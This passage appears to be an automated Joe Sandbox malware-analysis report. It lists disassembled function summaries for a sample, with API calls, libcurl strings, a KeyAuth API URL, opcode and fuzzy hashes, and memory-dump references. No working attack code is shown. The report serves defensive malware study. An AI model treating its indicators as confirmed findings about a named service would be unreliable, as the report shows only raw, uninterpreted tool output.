                                              • Part of subcall function 00007FF7E5A3F1F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF7E59E43EE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E5A3F20A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                            • String ID: https://keyauth.win/api/1.2/
                                            • API String ID: 1155477157-3933380396
                                            • Opcode ID: 060c81ddfd111417c5091a61c3a1e0148c2aa5dfc69f83c4e14a55458c154890
                                            • Instruction ID: 7a59e266786c0787725b9f9ab292e101e57fcca146caa1ee5c73b96228709744
                                            • Opcode Fuzzy Hash: 060c81ddfd111417c5091a61c3a1e0148c2aa5dfc69f83c4e14a55458c154890
                                            • Instruction Fuzzy Hash: 8431C622B0964944EE19BA55A6643BC92D1EF04FE4F940632CE2D87BD5EF7CE4828312
                                            APIs
                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,0000006E00000006,?,FFFFFFFF,00007FF7E59E11FA), ref: 00007FF7E59F075F
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,0000006E00000006,?,FFFFFFFF,00007FF7E59E11FA), ref: 00007FF7E59F079C
                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,0000006E00000006,?,FFFFFFFF,00007FF7E59E11FA), ref: 00007FF7E59F07A6
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59F07D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID: https://keyauth.win/api/1.2/
                                            • API String ID: 1775671525-3933380396
                                            • Opcode ID: e4ce4394363e5324866952fb85af2f58288ab99f1bf50804098d43e406ae33b8
                                            • Instruction ID: 8351c0c4483c3bd4f5ef7ee6279cd2359bc4bdafbb4114ceab37512103fd22e1
                                            • Opcode Fuzzy Hash: e4ce4394363e5324866952fb85af2f58288ab99f1bf50804098d43e406ae33b8
                                            • Instruction Fuzzy Hash: 76310561B0974994EE10AB11E9243BDF699AF04FD0F980636DE5E477C5DF7CE0618322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_errnofreememcpyrecv
                                            • String ID: Recv failure: %s
                                            • API String ID: 267823591-4276829032
                                            • Opcode ID: 76a45e13e4a53d45da3cc6b1da66ccd2384b2d5048a0601096faee186a3d44d2
                                            • Instruction ID: 0657289e9c07301ac5bdd94f5711f6581930b2d04cca3ab5f35126398b434994
                                            • Opcode Fuzzy Hash: 76a45e13e4a53d45da3cc6b1da66ccd2384b2d5048a0601096faee186a3d44d2
                                            • Instruction Fuzzy Hash: 7F31C272B1574981EB20AF21E854BA9A760BB48FD8F904136CE5D87384DF3CD455C351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: Connection died, retrying a fresh connect$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                            • API String ID: 1865132094-195851662
                                            • Opcode ID: 04786302b464ce4458984dfce92d798d726ef78eb1baf23cf9b6393892aed6c8
                                            • Instruction ID: e3471d22dc8d574b3bff1d0f69e8ebc88cfe83e9b2981a8467b20437ce323e93
                                            • Opcode Fuzzy Hash: 04786302b464ce4458984dfce92d798d726ef78eb1baf23cf9b6393892aed6c8
                                            • Instruction Fuzzy Hash: AE41B132B1868A81EB54AB35E0607A9EB90EF44F8CF884032DB4D87795CF3DD495C712
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreemalloc
                                            • String ID: Unrecognized content encoding type. libcurl understands %s content encodings.$identity
                                            • API String ID: 3985033223-1703240927
                                            • Opcode ID: df79667446998cfa9fe32aac958eaa7bfc2909eaa380d159321fe0720fedef74
                                            • Instruction ID: 750d78e9b0dc731791e493321f0caa01d67e7022182495bae52bed8fef7f59d0
                                            • Opcode Fuzzy Hash: df79667446998cfa9fe32aac958eaa7bfc2909eaa380d159321fe0720fedef74
                                            • Instruction Fuzzy Hash: 27419321B19A4A85EB05AF25A460778EBA0FF48FD8F854232CE5D877D4EF3CE4418311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$_strdupfree
                                            • String ID: FALSE
                                            • API String ID: 3359907120-3701058176
                                            • Opcode ID: e075efb9f471538cf5fea25a544e13b80d27f3e372c79109e91b7771380f9fd1
                                            • Instruction ID: f911baff096d46e1f074dd13a103f5c7bc284fa19b9e89eb525e6a795b8ace68
                                            • Opcode Fuzzy Hash: e075efb9f471538cf5fea25a544e13b80d27f3e372c79109e91b7771380f9fd1
                                            • Instruction Fuzzy Hash: 7731C422F0D59E4DFB22DF249424B7CAF919F05F68F940633C69A816E1DE3C9585C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreestrpbrk
                                            • String ID: RCPT TO:<%s>$RCPT TO:<%s@%s>
                                            • API String ID: 1812939018-579818044
                                            • Opcode ID: 310991105be6317898f4caa6c789cae6c9633f0561393eaf4ed82575c1179860
                                            • Instruction ID: 4824ec8fe6fffb10afeffeec63d39ded0857fb5c7123dbdbc475a220ac37da06
                                            • Opcode Fuzzy Hash: 310991105be6317898f4caa6c789cae6c9633f0561393eaf4ed82575c1179860
                                            • Instruction Fuzzy Hash: BD318F66B18B8581EB11EB25E4607B9ABA0FF84F94F884232EA8E437D1DF7CD541C311
                                            APIs
                                              • Part of subcall function 00007FF7E59E3D70: memcpy.VCRUNTIME140(?,?,0000000100000000,00007FF7E59F083D), ref: 00007FF7E59E3E22
                                              • Part of subcall function 00007FF7E59E3D70: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E3E47
                                              • Part of subcall function 00007FF7E59E3D70: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,0000000100000000,00007FF7E59F083D), ref: 00007FF7E59E3E04
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59F0A50
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59F0A57
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59F0A5E
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59F0A65
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59F0A6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmemcpy
                                            • String ID:
                                            • API String ID: 2318677668-0
                                            • Opcode ID: 5e99ca1bde4e1416277db961ec109b41f83edf1a84fdc12d99675d70987ffbfa
                                            • Instruction ID: f702a71b04580552815c763e60d0b370ff1ba32c102493011568e2f78187472e
                                            • Opcode Fuzzy Hash: 5e99ca1bde4e1416277db961ec109b41f83edf1a84fdc12d99675d70987ffbfa
                                            • Instruction Fuzzy Hash: A561C472A04B8985EB20EF20E4687BDB765EB41FC8F904032DA8D86A96DF7DD4D0C311
                                            APIs
                                              • Part of subcall function 00007FF7E5A34290: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342B6
                                              • Part of subcall function 00007FF7E5A34290: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342D7
                                              • Part of subcall function 00007FF7E5A34290: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342F2
                                              • Part of subcall function 00007FF7E5A34290: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A34300
                                              • Part of subcall function 00007FF7E5A34290: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A34312
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A343B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: HTTP$NTLM
                                            • API String ID: 2190258309-4188377180
                                            • Opcode ID: 39a23f78fe25a4d256fce5b592c7a67188582c1c21e97960aec82a00448847b9
                                            • Instruction ID: 37457336126da7e6280331ac19a04bd208e83b38c2fd81090473fc66cc51fd9a
                                            • Opcode Fuzzy Hash: 39a23f78fe25a4d256fce5b592c7a67188582c1c21e97960aec82a00448847b9
                                            • Instruction Fuzzy Hash: 31612E32608B8A86E7609F15E454B6EBBA4FF88F84F944136DA8D83B58DF3CD454CB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID: TRUE
                                            • API String ID: 3401966785-3412697401
                                            • Opcode ID: 2de0af5476a8bee818dfaffc51287aacab6865fda698d13ebbfacdef7cd6ec0c
                                            • Instruction ID: 5286f02bae8f338c58b91d8b5ad6ca7772320591873da53aad507e3d9cec2b78
                                            • Opcode Fuzzy Hash: 2de0af5476a8bee818dfaffc51287aacab6865fda698d13ebbfacdef7cd6ec0c
                                            • Instruction Fuzzy Hash: 97414661B0879A49FB295A15852477DAF52EF00FE8F944633CA6EC73C1CE3CD0898322
                                            APIs
                                            • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7E5A3D5A0), ref: 00007FF7E5A3D64F
                                              • Part of subcall function 00007FF7E5A17900: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7E59FA92A,?,?,?,?,?,?,?,00007FF7E59FA6F7), ref: 00007FF7E5A17911
                                              • Part of subcall function 00007FF7E5A17900: strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF7E5A17AB3
                                              • Part of subcall function 00007FF7E5A17900: strchr.VCRUNTIME140(?,?,?,00000000,TRUE,?,00000000,00000000,00000000,?), ref: 00007FF7E5A17AD0
                                            • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7E5A3D5A0), ref: 00007FF7E5A3D6BE
                                            • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7E5A3D5A0), ref: 00007FF7E5A3D6D8
                                            • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7E5A3D5A0), ref: 00007FF7E5A3D70E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_errno
                                            • String ID: xn--
                                            • API String ID: 2644425738-2826155999
                                            • Opcode ID: 423bf8c0c49e3ec128dd97a9686630982e6650d8334231880676cdb0425b1833
                                            • Instruction ID: 984a6c3a38ce6191cab1ffd3955dff69903822632a5f34a130e969e975336cc9
                                            • Opcode Fuzzy Hash: 423bf8c0c49e3ec128dd97a9686630982e6650d8334231880676cdb0425b1833
                                            • Instruction Fuzzy Hash: 9841E255B1C68A85FB54BA218924BBDDE819F45FC4F888136DE4EC7BC1EE3CE4058362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: callocfreememset
                                            • String ID: CONNECT phase completed!$allocate connect buffer!
                                            • API String ID: 3505321882-591125384
                                            • Opcode ID: d7ea1e66ceb379eda812ece8c49fb1848ff451d92fd1e2f75f760f6ee0f4fc64
                                            • Instruction ID: 59eb14efa0ff6accf4f0224dd48273631a979c262a075b322c2c586d65bbd93c
                                            • Opcode Fuzzy Hash: d7ea1e66ceb379eda812ece8c49fb1848ff451d92fd1e2f75f760f6ee0f4fc64
                                            • Instruction Fuzzy Hash: 0851B322B1868A92E718AB31D6747BDBB90FF44F48F840036CB5D8B291DF78E565C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Start Date: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Start Date
                                            • API String ID: 1294909896-619256714
                                            • Opcode ID: 3cc400d705c7ae2362500cf1e020bece85d41da4efc320729d18f1b821df95dc
                                            • Instruction ID: 1326c80c0981aee2a518f779c00e5a20a225468f31ee2c59848de8eade8e21f2
                                            • Opcode Fuzzy Hash: 3cc400d705c7ae2362500cf1e020bece85d41da4efc320729d18f1b821df95dc
                                            • Instruction Fuzzy Hash: 3851B061B0D6DA85EB10AB649524BBCEF95EF01B88FC44433DA4D86654CF3CE645C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID: %s: %s
                                            • API String ID: 3401966785-1451338302
                                            • Opcode ID: 3c73917e9a3ff9f287237219b96bb395f56d01fc929189d139cfd492ab4b7b15
                                            • Instruction ID: fe3b1decdc4d0f4866453dca05d31855192492dc76958a503fa7b49e2263d989
                                            • Opcode Fuzzy Hash: 3c73917e9a3ff9f287237219b96bb395f56d01fc929189d139cfd492ab4b7b15
                                            • Instruction Fuzzy Hash: 4D415601B092D94AEA786E0694387B99B91AF46FE4F844237CE6F877C5DD3CD0458322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _errnofreememcpy
                                            • String ID: Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
                                            • API String ID: 738009125-4268564757
                                            • Opcode ID: 2666265653ab1ec3e10e930bd31a71e0d180f8da04622154dd8d31111f66fc27
                                            • Instruction ID: cdbd20230d39d86757b6672f97f84a323617026a6fac7747742b464a6d4a8106
                                            • Opcode Fuzzy Hash: 2666265653ab1ec3e10e930bd31a71e0d180f8da04622154dd8d31111f66fc27
                                            • Instruction Fuzzy Hash: B75192A2B0868A82EB24EA65D560BA9EF90FF45F94F844033DB4D83A45DF7DE4518312
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Start Date: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT$Start Date
                                            • API String ID: 1294909896-2752585153
                                            • Opcode ID: fd687db5ce81c312168de4ee473c0d8d84d0a0caf4907a782c0026f3af3b1231
                                            • Instruction ID: 4bb90d89f01607c50c321cc4cd6da6a474e931f3a164b604ff8df23ee54b1497
                                            • Opcode Fuzzy Hash: fd687db5ce81c312168de4ee473c0d8d84d0a0caf4907a782c0026f3af3b1231
                                            • Instruction Fuzzy Hash: 6E315162B0968A85EB10AB60D460BB9EB91EF05F88FC84433C64E9A255DF3CD6458322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemallocmemcpy
                                            • String ID: Start Date: %s$Start Date
                                            • API String ID: 3056473165-2389359183
                                            • Opcode ID: 931404bb7ef4e7a24fca340e42252142a84ad0bfd55e92b62d93b7e113a9c3aa
                                            • Instruction ID: 6ec82ca1fe0f8cac61967418ac35f3e3e8e6535abf5a7f34da3d9f068d5906f4
                                            • Opcode Fuzzy Hash: 931404bb7ef4e7a24fca340e42252142a84ad0bfd55e92b62d93b7e113a9c3aa
                                            • Instruction Fuzzy Hash: C521E551B0928A41EE15AB219524BB8EB92AF05FD8FC84533CD1E877D1DE3CA6448322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$_strdupmalloc
                                            • String ID:
                                            • API String ID: 4236146995-0
                                            • Opcode ID: c75352456abeb419cddd3a203c925fb66392ab3e1bfe211039d896eef24929ac
                                            • Instruction ID: 38c990ca08b5c971b92dc0d33771101b82d15a8d256c2a6c9ab4754517fc99ef
                                            • Opcode Fuzzy Hash: c75352456abeb419cddd3a203c925fb66392ab3e1bfe211039d896eef24929ac
                                            • Instruction Fuzzy Hash: 9D219262B15B8A81EB85DB259461B6867D1EF45F54F480035DE0D8BB44EF3CD990C332
                                            APIs
                                            Strings
                                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 00007FF7E5A15A75
